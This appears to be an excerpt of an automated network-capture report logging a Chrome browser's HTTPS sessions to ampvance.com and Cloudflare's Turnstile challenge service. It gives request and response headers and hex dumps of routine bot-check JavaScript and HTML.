                                                      2024-03-05 13:23:17 UTC1369INData Raw: 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d
                                                      Data Ascii: idth:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 22 3e 45 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 61 6e 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f 6e 74
                                                      Data Ascii: a http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to cont
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 57 31 6d 46 32 32 62 4d 63 4d 36 79 78 64 54 74 32 6a 62 38 6a 52 6b 50 61 72 69 63 59 4a 59 51 75 4f 62 30 72 71 39 45 69 5a 7a 53 5a 37 48 41 5a 42 4a 53 57 75 51 49 31 57 50 4e 34 64 5a 2e 36 56 75 72 38 55 35 38 50 4b 4f 43 4f 57 32 6a 43 4e 44 36 64 2e 36 4c 50 69 6a 4a 50 6f 78 68 6c 48 63 49 55 46 77 67 53 5f 62 72 65 4a 46 67 4a 45 70 75 32 6b 53 31 6d 77 54 7a 54 6c 77 6a 56 64 71 66 52 39 76 61 4f 41 76 37 6a 38 64 33 75 56 53 54 7a 33 6e 7a 52 4a 70 5a 32 7a 6c 77 6e 68 2e 51 65 65 56 69 59 61 38 53 52 4c 6c 76 79 73 77 49 56 6c 66 56 78 70 68 4f 75 4b 70 37 65 36 53 74 6d 65 75 46 68 4e 7a 59 63 48 43 46 7a 31 76 2e 34 34 34 4d 76 69 31 36 5f 30 53 50 57 57 6c 6c 75 6c 6e 6d 59 66 70 36 71 63 56 4f 6a 47 43 64 32 67 5f 32 65 30 71 53 6f 43 38
                                                      Data Ascii: W1mF22bMcM6yxdTt2jb8jRkParicYJYQuOb0rq9EiZzSZ7HAZBJSWuQI1WPN4dZ.6Vur8U58PKOCOW2jCND6d.6LPijJPoxhlHcIUFwgS_breJFgJEpu2kS1mwTzTlwjVdqfR9vaOAv7j8d3uVSTz3nzRJpZ2zlwnh.QeeViYa8SRLlvyswIVlfVxphOuKp7e6StmeuFhNzYcHCFz1v.444Mvi16_0SPWWllulnmYfp6qcVOjGCd2g_2e0qSoC8


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.449747104.17.3.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:17 UTC581OUTGET /turnstile/v0/g/a0d8959cb7d0/api.js?onload=lDtWXt4&render=explicit HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Origin: https://ampvance.com
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: script
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:17 UTC296INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:17 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Content-Length: 39035
                                                      Connection: close
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: max-age=31536000
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b731ec417c1-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:17 UTC1073INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 70 74 28 65 2c 72 2c 74 2c 69 2c 66 2c 73 2c 67 29 7b 74 72 79 7b 76 61 72 20 76 3d 65 5b 73 5d 28 67 29 2c 79 3d 76 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 75 29 7b 74 28 75 29 3b 72 65 74 75 72 6e 7d 76 2e 64 6f 6e 65 3f 72 28 79 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 79 29 2e 74 68 65 6e 28 69 2c 66 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 69 2c 66 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74
                                                      Data Ascii: "use strict";(function(){function pt(e,r,t,i,f,s,g){try{var v=e[s](g),y=v.value}catch(u){t(u);return}v.done?r(y):Promise.resolve(y).then(i,f)}function vt(e){return function(){var r=this,t=arguments;return new Promise(function(i,f){var s=e.apply(r,t);funct
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 21 31 2c 67 2c 76 3b 74 72 79 7b 66 6f 72 28 74 3d 74 2e 63 61 6c 6c 28 65 29 3b 21 28 66 3d 28 67 3d 74 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 69 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 69 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 66 3d 21 30 29 3b 7d 63 61 74 63 68 28 79 29 7b 73 3d 21 30 2c 76 3d 79 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 66 26 26 74 2e 72 65 74 75 72 6e 21 3d 6e 75 6c 6c 26 26 74 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 73 29 74 68 72 6f 77 20 76 7d 7d 72 65 74 75 72 6e 20 69 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e
                                                      Data Ascii: !1,g,v;try{for(t=t.call(e);!(f=(g=t.next()).done)&&(i.push(g.value),!(r&&i.length===r));f=!0);}catch(y){s=!0,v=y}finally{try{!f&&t.return!=null&&t.return()}finally{if(s)throw v}}return i}}function yt(){throw new TypeError("Invalid attempt to destructure n
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 74 75 72 6e 29 26 26 73 2e 63 61 6c 6c 28 66 29 2c 30 29 3a 66 2e 6e 65 78 74 29 26 26 21 28 73 3d 73 2e 63 61 6c 6c 28 66 2c 75 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 73 3b 73 77 69 74 63 68 28 66 3d 30 2c 73 26 26 28 75 3d 5b 75 5b 30 5d 26 32 2c 73 2e 76 61 6c 75 65 5d 29 2c 75 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 73 3d 75 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 74 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 75 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 74 2e 6c 61 62 65 6c 2b 2b 2c 66 3d 75 5b 31 5d 2c 75 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 75 3d 74 2e 6f 70 73 2e 70 6f 70 28 29 2c 74 2e 74 72 79 73 2e 70 6f 70 28 29 3b 63 6f 6e 74 69 6e 75 65 3b
                                                      Data Ascii: turn)&&s.call(f),0):f.next)&&!(s=s.call(f,u[1])).done)return s;switch(f=0,s&&(u=[u[0]&2,s.value]),u[0]){case 0:case 1:s=u;break;case 4:return t.label++,{value:u[1],done:!1};case 5:t.label++,f=u[1],u=[0];continue;case 7:u=t.ops.pop(),t.trys.pop();continue;
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 75 74 65 22 7d 29 28 4b 7c 7c 28 4b 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 5f 46 41 49 4c 53 3d 22 61 6c 77 61 79 73 2d 66 61 69 6c 73 22 2c 65 2e 53 4f 4d 45 54 49 4d 45 53 5f 46 41 49 4c 53 3d 22 73 6f 6d 65 74 69 6d 65 73 2d 66 61 69 6c 73 22 2c 65 2e 4b 45 45 50 53 5f 4c 4f 4f 50 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 55 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 48 65 28 65 29 7b
                                                      Data Ascii: ute"})(K||(K={}));var We;(function(e){e.ALWAYS_FAILS="always-fails",e.SOMETIMES_FAILS="sometimes-fails",e.KEEPS_LOOPING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(We||(We={}));function ze(e){return U(["auto","dark","light"],e)}function He(e){
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 47 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 69 2c 66 29 7b 72 65 74 75 72 6e 20 69 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 66 2c 69 7d 2c 47 28 65 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 50 74 28 65 2c 72 29 7b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 72 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65
                                                      Data Ascii: lass as a function")}function G(e,r){return G=Object.setPrototypeOf||function(i,f){return i.__proto__=f,i},G(e,r)}function Pt(e,r){if(typeof r!="function"&&r!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Obje
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 66 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 47 28 66 2c 69 29 7d 2c 49 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 44 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 26 26 28 4c 28 72 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 72 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 72 3a 53 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 55 74 28 65 29 7b 76 61 72 20 72 3d 41 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 4a 28 65 29 2c 66 3b 69 66 28 72 29 7b 76 61 72 20 73 3d 4a 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 66 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74
                                                      Data Ascii: tructor:{value:f,enumerable:!1,writable:!0,configurable:!0}}),G(f,i)},Ie(e)}function Dt(e,r){return r&&(L(r)==="object"||typeof r=="function")?r:Se(e)}function Ut(e){var r=Ae();return function(){var i=J(e),f;if(r){var s=J(this).constructor;f=Reflect.const
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 3d 21 30 2c 69 3d 21 31 2c 66 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 73 3d 65 2e 77 69 64 67 65 74 4d 61 70 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 2c 67 3b 21 28 74 3d 28 67 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 74 3d 21 30 29 7b 76 61 72 20 76 3d 62 65 28 67 2e 76 61 6c 75 65 2c 32 29 2c 79 3d 76 5b 30 5d 2c 75 3d 76 5b 31 5d 2c 62 3b 75 2e 77 61 74 63 68 63 61 74 2e 73 65 71 3d 65 2e 77 61 74 63 68 43 61 74 53 65 71 2c 75 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 3d 3d 30 26 26 28 75 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 65 2e 77 61 74 63 68 43 61 74 53 65 71 29 3b 76 61 72 20 54 3d 58 28 79 29 3b 69 66 28 21 54 29 7b 75 2e 77 61 74 63 68 63 61
                                                      Data Ascii: =!0,i=!1,f=void 0;try{for(var s=e.widgetMap[Symbol.iterator](),g;!(t=(g=s.next()).done);t=!0){var v=be(g.value,2),y=v[0],u=v[1],b;u.watchcat.seq=e.watchCatSeq,u.watchcat.lastAckedSeq===0&&(u.watchcat.lastAckedSeq=e.watchCatSeq);var T=X(y);if(!T){u.watchca
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 69 66 28 69 29 74 68 72 6f 77 20 66 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 2c 72 29 7b 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 3d 3d 3d 6e 75 6c 6c 26 26 28 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 72 28 65 2c 72 29 7d 2c 61 72 29 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 21 31 3b 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 21 3d 3d 6e 75 6c 6c 26 26 28 65 2e 77 69 64 67 65 74 4d 61 70 2e 73 69 7a 65 3d 3d 3d 30 7c 7c 72 29 26 26 63 6c 65 61 72 49
                                                      Data Ascii: if(i)throw f}}}function Ze(e,r){e.watchCatInterval===null&&(e.watchCatInterval=setInterval(function(){or(e,r)},ar))}function et(e){var r=arguments.length>1&&arguments[1]!==void 0?arguments[1]:!1;e.watchCatInterval!==null&&(e.widgetMap.size===0||r)&&clearI
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 29 2c 69 3d 3d 6e 75 6c 6c 7c 7c 28 74 3d 69 2e 70 61 72 65 6e 74 4e 6f 64 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 74 3d 3d 3d 76 6f 69 64 20 30 7c 7c 74 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 67 2c 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 29 7b 76 61 72 20 74 3d 65 2e 5f 70 53 74 61 74 65 3b 72 65 74 75 72 6e 20 74 3f 28 72 2e 69 73 52 65 61 64 79 3d 74 2e 69 73 52 65 61 64 79 2c 72 2e 69 73 52 65 63 61 70 74 63 68 61 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 4d 6f 64 65 3d 74 2e 69 73 52 65 63 61 70 74 63 68 61 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 4d 6f 64 65 2c 72 2e 6c 61 73 74 57 69 64 67 65 74 49 64 78 3d 74 2e 6c 61 73 74 57 69 64 67 65 74 49 64 78 2c 72 2e 73 63 72 69 70 74 57 61 73 4c 6f 61 64 65 64 41 73 79 6e 63 3d 74 2e 73 63 72 69
                                                      Data Ascii: ),i==null||(t=i.parentNode)===null||t===void 0||t.replaceChild(g,i)}}function Ht(e,r){var t=e._pState;return t?(r.isReady=t.isReady,r.isRecaptchaCompatibilityMode=t.isRecaptchaCompatibilityMode,r.lastWidgetIdx=t.lastWidgetIdx,r.scriptWasLoadedAsync=t.scri
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 70 61 72 65 6e 74 4e 6f 64 65 7d 72 65 74 75 72 6e 20 69 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 69 66 28 74 79 70 65 6f 66 20 65 21 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 64 6a 62 32 3a 20 65 78 70 65 63 74 65 64 20 73 74 72 69 6e 67 2c 20 67 6f 74 20 22 2e 63 6f 6e 63 61 74 28 74 79 70 65 6f 66 20 65 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 4c 28 65 29 29 29 3b 66 6f 72 28 76 61 72 20 72 3d 35 33 38 31 2c 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 69 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 29 3b 72 3d 72 2a 33 33 5e 69 7d 72 65 74 75 72 6e 20 72 3e 3e 3e 30 7d 76 61 72 20 6f 65 3d 21 31 2c
                                                      Data Ascii: parentNode}return i.substring(0,t)}function Bt(e){if(typeof e!="string")throw new Error("djb2: expected string, got ".concat(typeof e=="undefined"?"undefined":L(e)));for(var r=5381,t=0;t<e.length;t++){var i=e.charCodeAt(t);r=r*33^i}return r>>>0}var oe=!1,


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.449748172.67.165.1054434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:18 UTC474OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1934419278:1709641400:nf2d9uXBpqI_eJS2Oi0Ck7HqLPnuP008yVnwRQOaiCc/85fa6b69aed817b1/8a01f925e609515 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:18 UTC713INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 05 Mar 2024 13:23:18 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: sGMQ7ZnB1wmt08gyooy3Ow==$PUlWVL5xZEg2mLV8T1YvKA==
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eFKOaPpx89p%2FxHFabzL%2FcNM%2FGInwOwyYruP%2Fc3Decpp1SMm7VbrDHTNV7btRATnaB41vL3l7z%2FJ9Eq5N8tDO%2FQxY2KA60e4dfNBVGGvvPuPWdFqemB4cVwhcqKPpoio%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b76cf9e330c-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:18 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-03-05 13:23:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.449749104.17.2.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:18 UTC754OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normal HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-Dest: iframe
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:18 UTC1187INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:18 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                      cross-origin-embedder-policy: require-corp
                                                      cross-origin-opener-policy: same-origin
                                                      cross-origin-resource-policy: cross-origin
                                                      document-policy: js-profiling
                                                      origin-agent-cluster: ?1
                                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      referrer-policy: same-origin
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b76cf6e4369-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:18 UTC182INData Raw: 37 62 30 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e
                                                      Data Ascii: 7b0f<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta n
                                                      2024-03-05 13:23:18 UTC1369INData Raw: 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 67 2f 63 6d 67 2f 31 2f 77 68 30 45 30 53 58 59 6e 78 36 70 54 42 64 4a 57 25 32 46 6c 39 32 36 49 25 32 42 50 52 55 70 6c 52 64 74 51 7a 33 4b 39 6c 48 58 73 25 32 46 73 25 33 44 22 20 61 73 3d 22 69 6d 61 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 68 65 63 6b 69 6e 67 20 79 6f 75 72 20 42 72 6f 77 73 65 72 26 68 65 6c 6c 69 70 3b 3c 2f
                                                      Data Ascii: ame="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="preload" href="/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D" as="image"> <title>Checking your Browser&hellip;</
